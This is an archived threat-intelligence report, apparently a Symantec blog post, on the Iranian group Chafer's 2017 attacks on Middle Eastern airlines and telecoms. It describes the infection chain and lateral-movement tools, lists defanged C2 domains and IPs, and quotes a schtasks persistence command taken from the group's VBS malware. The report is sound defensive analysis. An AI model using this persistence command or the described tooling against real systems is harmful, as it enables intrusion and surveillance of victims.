{ "id": "b713a8dd-f2d9-41ed-8453-d23f26a02b3e", "created_at": "2026-04-06T01:30:25.838485Z", "updated_at": "2026-04-10T03:37:36.590448Z", "deleted_at": null, "sha1_hash": "02e9d44492fa846e30c977197aed811b7ea2177b", "title": "Chafer: Latest Attacks Reveal Heightened Ambitions", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 58320, "plain_text": "Chafer: Latest Attacks Reveal Heightened Ambitions\r\nBy About the Author\r\nArchived: 2026-04-06 00:24:48 UTC\r\nChafer, the Iran-based targeted attack group, mounted further operations throughout 2017, attacking more\r\norganizations in the Middle East and beyond, and deploying several new tools. The group staged a number of\r\nambitious new attacks last year, including the compromise of a major telecoms services provider in the region.\r\nThere is also evidence that it attempted to attack a major international travel reservations firm. Chafer appears to\r\nbe primarily engaged in surveillance and tracking of individuals, with most of its attacks likely carried out to\r\ngather information on targets or facilitate surveillance.\r\nChafer has been active since at least July 2014 and its activities were first exposed by Symantec in December\r\n2015, when it was found to be conducting targeted surveillance of domestic and international targets. At the time,\r\nmany of its targets were individuals located in Iran, and it had already begun compromising telecom providers as\r\nwell as airline companies in the Middle East region.\r\nExpansion of operations\r\nChafer appears to have been undeterred by its exposure in 2015 and continued to be very active during 2017,\r\nusing seven new tools, rolling out new infrastructure, and attacking nine new target organizations in the region.\r\nThe group hit organizations in Israel, Jordan, the United Arab Emirates, Saudi Arabia, and Turkey.\r\nSectors targeted included airlines; aircraft services; software and IT services companies serving the air and sea\r\ntransport sectors; telecoms services; payroll services; engineering consultancies; and document management\r\nsoftware.\r\nOutside of the Middle East, Symantec has also found evidence of attacks against one African airline and attempts\r\nto compromise an international travel reservations firm.\r\nAmbitious new targets\r\nOne of the organizations compromised by Chafer in 2017 was a telecoms services provider in the Middle East,\r\nwhich sells its solutions to multiple telecoms operators in the region. The ultimate goal of the attack may have\r\nbeen to facilitate surveillance of end-user customers of telecoms operators. By moving two steps up the supply\r\nchain the attackers could potentially have carried out surveillance on a vast pool of end-users.\r\nAlongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company’s\r\nown files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory\r\nalongside a number of hacking tools used by the attackers.\r\nA second target outside the Middle East provides further confirmation of Chafer’s heightened ambitions in recent\r\ntimes. Symantec found evidence that it had tried to compromise a large international travel reservations firm.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions\r\nPage 1 of 5\n\nThere was no indication that the attack was successful, but Chafer did successfully infiltrate an African airline that\r\nis a customer of the reservations firm.\r\nHow Chafer infects targets\r\nIn the earlier attacks from 2015, Symantec found evidence that Chafer had been compromising targeted\r\norganizations by attacking their web servers, likely through SQL injection attacks, in order to drop malware onto\r\nthem. In 2017, the group added a new infection method to its toolkit, using malicious documents which are likely\r\ncirculated using spear-phishing emails sent to individuals working in targeted organizations.\r\nThese documents were Excel spreadsheets. When opened, they downloaded a malicious VBS file that in turn ran a\r\nPowerShell script. Several hours later, a dropper would appear on the compromised computer. This would install\r\nthree files on the computer, an information stealer, a screen capture utility, and an empty executable.\r\nThe screen capture utility appeared to be used for initial information gathering, as it was only used briefly at the\r\nbeginning of each infection and not seen again. The information stealer was capable of stealing the contents of the\r\nclipboard, taking screenshots, recording keystrokes and stealing files and user credentials. After this initial\r\nactivity, the attackers usually downloaded more of their tools to the computer using a PowerShell downloader and\r\nbegan moving across the victim’s network.\r\nNew tools used to compromise networks\r\nSymantec has seen Chafer use seven new tools in its more recent campaigns, in addition to malware it is\r\npreviously known to have used. Most of the new tools are freely available, off-the-shelf tools, put to a malicious\r\nuse. The new tools include:\r\nRemcom: An open-source alternative to PsExec, which is a Microsoft Sysinternals tool used for executing\r\nprocesses on other systems.\r\nNon-sucking Service Manager (NSSM): An open-source alternative to the Windows Service Manager\r\nwhich can be used to install and remove services and will restart services if they crash.\r\nA custom screenshot and clipboard capture tool.\r\nSMB hacking tools: Used in conjunction with other tools to traverse target networks. These tools include\r\nthe EternalBlue exploit (which was previously used by WannaCry and Petya).\r\nGNU HTTPTunnel: An open-source tool that can create a bidirectional HTTP tunnel on Linux computers,\r\npotentially allowing communication beyond a restrictive firewall.\r\nUltraVNC: An open-source remote administration tool for Microsoft Windows.\r\nNBTScan: A free tool for scanning IP networks for NetBIOS name information.\r\nChafer has also continued to use tools previously associated with the group, including its own custom backdoor\r\nRemexi (Backdoor.Remexi); the aforementioned PsExec; Mimikatz (Hacktool.Mimikatz), a free tool capable of\r\nchanging privileges, exporting security certificates, and recovering Windows passwords in plaintext; Pwdump\r\n(Pwdump) a tool that is used to grab Windows password hashes from a remote Windows computer; and Plink\r\n(PuTTY Link) a command-line utility used to create reverse SSH sessions.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions\r\nPage 2 of 5\n\nChafer has used these tools in concert to traverse targeted networks. The group has recently adopted NSSM to\r\nmaintain persistence and install the service which runs Plink on the compromised computer. Plink is then used to\r\nopen reverse SSH sessions from the attacker's server to the RDP port on the victim computer. This presumably\r\ngives them RDP access to the compromised computer.\r\nOnce a foothold is established, the attackers use PsExec, Remcom, and SMB hacking tools to begin moving\r\nacross the victim’s network.\r\nNew infrastructure in use\r\nChafer has also begun using new infrastructure. The domain win7-updates[.]com is being used by the group as a\r\ncommand and control address. The domain has been referenced several times in command lines, e.g:\r\ns224.win7-update[.]com\r\ns5060.win7-update[.]com        \r\ns21.win7-update[.]com\r\nIt has also been embedded in a dropper:\r\nhxxp://wsus65432.win7-update[.]com  \r\nSymantec also discovered multiple IP addresses that were used as infrastructure by the attackers. It is unclear\r\nwhether these were leased or hijacked, but the fact that many of them appear to follow a pattern—with the latter\r\nthree numbers of each address often running in sequence—makes it likely they were deliberately selected by the\r\nattackers.\r\n107.191.62[.]45\r\n94.100.21[.]213\r\n89.38.97[.]112   \r\n148.251.197[.]113\r\n83.142.230[.]113\r\n87.117.204[.]113              \r\n89.38.97[.]115   \r\n87.117.204[.]115\r\n185.22.172[.]40\r\n92.243.95[.]203\r\n91.218.114[.]204\r\n86.105.227[.]224                              \r\n91.218.114[.]225\r\n134.119.217[.]84\r\nIn one case, Symantec found what appeared to be a staging server used by the attackers. The server belonged to\r\none of the targeted organizations. Copies of many of the tools used by the group were discovered on the server.\r\nThe attackers didn’t even bother hiding their activity and saved items to the desktop, often without renaming\r\nthem.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions\r\nPage 3 of 5\n\nLinks to Crambus?\r\nChafer’s activities have some links to another group known as Crambus (aka Oilrig). Both groups have been\r\nobserved using the same IP address for command and control purposes. In addition to this, both groups have been\r\nseen using a similar infection vector, namely an Excel document which drops a malicious VBS file. Both VBS\r\nfiles reference the same file path, containing the same misspelling:\r\n“schtasks.exe /create/ F /sc minute /mo 2 /tn \"UpdatMachine\" /tr\r\n%LOCALAPPDATA%\\microsoft\\Feed\\Y658123.vbs”\r\nAre the two groups one and the same? While this may be a possibility, at present there isn’t enough evidence to\r\nsupport that hypothesis. What is more likely is that the two groups are known to each other and enjoy access to a\r\nshared pool of resources.\r\nGrowing threat to organizations in the Middle East\r\nChafer’s recent activities indicate that the group remains highly active, is continuing to hone its tools and tactics,\r\nand has become more audacious in its choice of targets. Although a regional actor, the group has followed two\r\ntrends seen globally among targeted attack groups. The first is a greater reliance on freely available software tools,\r\nalso known as “living off the land.” By limiting their use of malware, groups such as Chafer hope to be less\r\nconspicuous on a victim’s network and, if discovered, make their attack more difficult to attribute.\r\nThe second trend is towards attacks on the supply chain, compromising organizations with the goal of then\r\nattacking the customers, or even the customers of the customers, of those organizations. These attacks require\r\nmore “steps” to reach their ultimate target, which adds additional time and risk for attackers to reach their targets. \r\nHowever these attacks also leverage trusted channels into the eventual target, e.g., through a trusted supplier,\r\nallowing attackers to potentially circumvent security systems at the organization they ultimately wish to\r\ncompromise. These attacks are riskier but come with a potentially higher reward and, if successful, could give the\r\nattackers access to a vast pool of potential targets. \r\nProtection\r\nSymantec has the following protection in place to protect customers against these attacks:\r\nFile-based protection\r\nBackdoor.Remexi\r\nBackdoor.Remexi.B\r\nHacktool.Mimikatz\r\nPwdump\r\nIPS: network-based protection\r\nSystem Infected: Backdoor.Remexi Activity\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions\r\nPage 4 of 5\n\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" ], "report_names": [ "chafer-latest-attacks-reveal-heightened-ambitions" ], "threat_actors": [ { "id": "62947fad-14d2-40bf-a721-b1fc2fbe5b5d", "created_at": "2025-08-07T02:03:24.741594Z", "updated_at": "2026-04-10T02:00:03.653394Z", "deleted_at": null, "main_name": "COBALT HICKMAN", "aliases": [ "APT39 ", "Burgundy Sandstorm ", "Chafer ", "ITG07 ", "Remix Kitten " ], "source_name": "Secureworks:COBALT HICKMAN", "tools": [ "MechaFlounder", "Mimikatz", "Remexi", "TREKX" ], "source_id": "Secureworks", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "bee22874-f90e-410b-93f3-a2f9b1c2e695", "created_at": "2022-10-25T16:07:23.45097Z", "updated_at": "2026-04-10T02:00:04.610108Z", "deleted_at": null, "main_name": "Chafer", "aliases": [ "APT 39", "Burgundy Sandstorm", "Cobalt Hickman", "G0087", "ITG07", "Radio Serpens", "Remix Kitten", "TA454" ], "source_name": "ETDA:Chafer", "tools": [ "ASPXSpy", "ASPXTool", "Antak", "CACHEMONEY", "EternalBlue", "HTTPTunnel", "LOLBAS", "LOLBins", "Living off the Land", "MechaFlounder", "Metasploit", "Mimikatz", "NBTscan", "NSSM", "Non-sucking Service Manager", "POWBAT", "Plink", "PuTTY Link", "Rana", "Remcom", "Remexi", "RemoteCommandExecution", "SafetyKatz", "UltraVNC", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "nbtscan", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439025, "ts_updated_at": 1775792256, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/02e9d44492fa846e30c977197aed811b7ea2177b.pdf", "text": "https://archive.orkl.eu/02e9d44492fa846e30c977197aed811b7ea2177b.txt", "img": "https://archive.orkl.eu/02e9d44492fa846e30c977197aed811b7ea2177b.jpg" } }